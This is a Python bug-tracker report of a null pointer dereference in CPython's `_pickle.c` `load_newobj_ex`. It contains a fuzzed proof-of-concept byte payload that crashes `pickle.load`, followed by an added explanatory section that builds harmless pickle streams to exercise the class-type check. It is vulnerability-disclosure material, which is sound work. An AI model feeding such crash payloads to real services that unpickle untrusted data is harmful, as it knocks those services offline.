
Author: blarsen
Recipients: blarsen
Date: 2015-07-14.02:16:15
Message-id: <1436840178.63.0.757852157332.issue24630@psf.upfronthosting.co.za>
`load_newobj_ex` in Modules/_pickle.c can crash with a null pointer dereference.


File Modules/_pickle.c:

    static int
    load_newobj_ex(UnpicklerObject *self)
    {
        PyObject *cls, *args, *kwargs;
        PyObject *obj;
        PickleState *st = _Pickle_GetGlobalState();

        // ...

        PDATA_POP(self->stack, cls);                              // *** 1 ***
        if (cls == NULL) {
            Py_DECREF(kwargs);
            Py_DECREF(args);
            return -1;
        }

        if (!PyType_Check(cls)) {                                 // *** 2 ***
            Py_DECREF(kwargs);
            Py_DECREF(args);
            Py_DECREF(cls);
            PyErr_Format(st->UnpicklingError,
                         "NEWOBJ_EX class argument must be a type, not %.200s",
                         Py_TYPE(cls)->tp_name);                  // *** 3 ***
            return -1;
        }

        // ...
    }

1. `cls` is successfully unpickled, but has an ob_type field set to 0
2. `cls` is determined not to be a `PyType` object
3. `Py_TYPE(cls)` gives a null pointer that is dereferenced via `->tp_name`


Environment:

    $ python3.4 --version
    Python 3.4.2

    $ uname -a
    Linux debian-8-amd64 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt9-3~deb8u1 (2015-04-24) x86_64 GNU/Linux


POC:

    from io import BytesIO
    from pickle import load
    
    payload = b']\x8f\x8f\x8f\x8f\x8f\x8f\x8f\x8fGGbG\x10GGGGGGG?GGGGGGG:gGGGGB(GRGGGGUGGGGGGhZGGGJGGGGGGGGGTGGGGGCGGGGGGGGgGG7GB(GRGGGGvGGGGG\xff\xff\x00\x00GGJGGGGGGGGGTGCCCCCCCCCCCCCCCCCCCCCCCC<GGGGGGZCCCCCCGGGGCGGGG\x00GGG\xff\xffdGG hGGGGGGG\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85CCCCCCCCCCCCCCCCCCCCCC\x85\x91\x85\x85\x85\x85CCCC\xccCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC<GGGG\x92\x92\x92\x92\x04\x00\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92CCCCCCCCCCCC<GGGGGGCCC\x03\xe8CCCCCeCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC_CTCCCCCCCCCCCCCCCCCCCCCCCCRCCCCCCCCCCCCCCCCCCCGCCCCCC<GGGGGGCCCCCCCCCCCC\x80\x00CCCCCCCCC\x00\x80\x00\x00$CCCCCCCCCC,CCCC"CCCCCCCCCCCCCCCCCCCCCCCCGGGGGGGGCCCCCCCC\x00\x80\x00\x00$CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC hGGGCCCCCCCQCGCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCPCACCCCCCCCCCCCCCCCCCCCCCCcCCKCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC hGGGGCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC<GGGGGGCCCCCC\xa7\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85CCC$CCCCCCCCCCCCCCCCCCCCCCCC_CCCCCCCCCCCCCCCCCCCCCCCCCCC@CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC<GGGGGGZCCCCCCCCCCCCKCCCCCCGGGGGGGGG?GGGGGGGGgGGGGG\xeb\xeb\xebCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCQCGCCCcCCCCCCCCCC@CCCCCCCCCCCCCCC@CCCCCCCCCCCCCCCCC\x10\x00\x7fCCCCCGCC\x10\x00\x00\x00CCCCCCCCCCCCCCCCCBCCCCCCCCCCCCCCCCCCCCCC_CCCCCCCCCCCCCCCCCCCCCCCCCCCCCACCCCCCCCCCCCCCCCCCCCCCCCCCCBCCCCCCCCCCCCCCFCCCCCCCCCCCCCCCCCCCCCCCC\x00\x00\x00\x80CCCCCC\x85\x85\x85\x85\x85\x91\x85\x85b\x85\x85\x85\x85\x85\x85G\x00GhGGGGGGGGGGGG?GGFGGGGGgGGGGG\xeb\xeb\xeb\xeb\xeb\xeb\xeb\xeb'
    load(BytesIO(payload))
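The snippet above pops `cls` only after `kwargs` and `args` (both are released on the early-return path), so on the unpickler stack the class sits below its positional and keyword arguments, and the `PyType_Check` branch is the first validation the class argument meets. The following hand-built protocol-4 streams drive that branch and its neighbours from Python. This is an added example, not code from the report or from CPython; it assumes a CPython whose `pickle.loads` uses the C `_pickle` module and that the `"NEWOBJ_EX class argument must be a type, not %.200s"` message quoted in the snippet is unchanged. It goes slightly beyond the report by also feeding a non-tuple `args` and a non-dict `kwargs`, which current CPython rejects with an `UnpicklingError` of its own. All byte strings are constructed here from the opcode values in `Lib/pickle.py`.

```python
import pickle

# pickle opcodes used below (values from Lib/pickle.py)
PROTO = b'\x80'             # followed by one protocol byte
SHORT_BINUNICODE = b'\x8c'  # 1-byte length + UTF-8 text
STACK_GLOBAL = b'\x93'      # pops name, module; pushes module.name
BININT1 = b'K'              # 1-byte unsigned int
EMPTY_TUPLE = b')'
EMPTY_DICT = b'}'
NEWOBJ_EX = b'\x92'         # pops kwargs, args, cls; pushes cls.__new__(cls, *args, **kwargs)
STOP = b'.'


def short_unicode(text: str) -> bytes:
    """Push a short str with SHORT_BINUNICODE (length must fit one byte)."""
    data = text.encode('utf-8')
    if len(data) > 255:
        raise ValueError('SHORT_BINUNICODE payload too long')
    return SHORT_BINUNICODE + bytes([len(data)]) + data


def global_ref(module: str, name: str) -> bytes:
    """Push module.name on the unpickler stack via STACK_GLOBAL."""
    return short_unicode(module) + short_unicode(name) + STACK_GLOBAL


def newobj_ex_stream(cls: bytes, args: bytes = EMPTY_TUPLE,
                     kwargs: bytes = EMPTY_DICT) -> bytes:
    """Protocol-4 stream: push cls, args, kwargs (in that order), then run NEWOBJ_EX."""
    return PROTO + b'\x04' + cls + args + kwargs + NEWOBJ_EX + STOP


def unpickle_or_error(stream: bytes):
    """Return the unpickled object, or the UnpicklingError text if the loader rejects the stream."""
    try:
        return pickle.loads(stream)
    except pickle.UnpicklingError as exc:
        return str(exc)


# Constructed streams (assumed inputs for this example):
VALID = newobj_ex_stream(global_ref('builtins', 'object'))            # object.__new__(object)
INT_AS_CLASS = newobj_ex_stream(BININT1 + b'\x01')                    # cls is the int 1, not a type
INT_AS_ARGS = newobj_ex_stream(global_ref('builtins', 'object'),
                               args=BININT1 + b'\x01')                # args is not a tuple
INT_AS_KWARGS = newobj_ex_stream(global_ref('builtins', 'object'),
                                 kwargs=BININT1 + b'\x01')            # kwargs is not a dict

if __name__ == '__main__':
    for label, stream in [('valid', VALID), ('int as class', INT_AS_CLASS),
                          ('int as args', INT_AS_ARGS), ('int as kwargs', INT_AS_KWARGS)]:
        print(f'{label:14} {stream!r} -> {unpickle_or_error(stream)!r}')
```

With the int pushed as the class, the loader takes the `PyType_Check` branch from the snippet and reports `NEWOBJ_EX class argument must be a type, not int`; the reporter's payload differs in that the object reaching that branch is one whose type pointer can no longer be read safely.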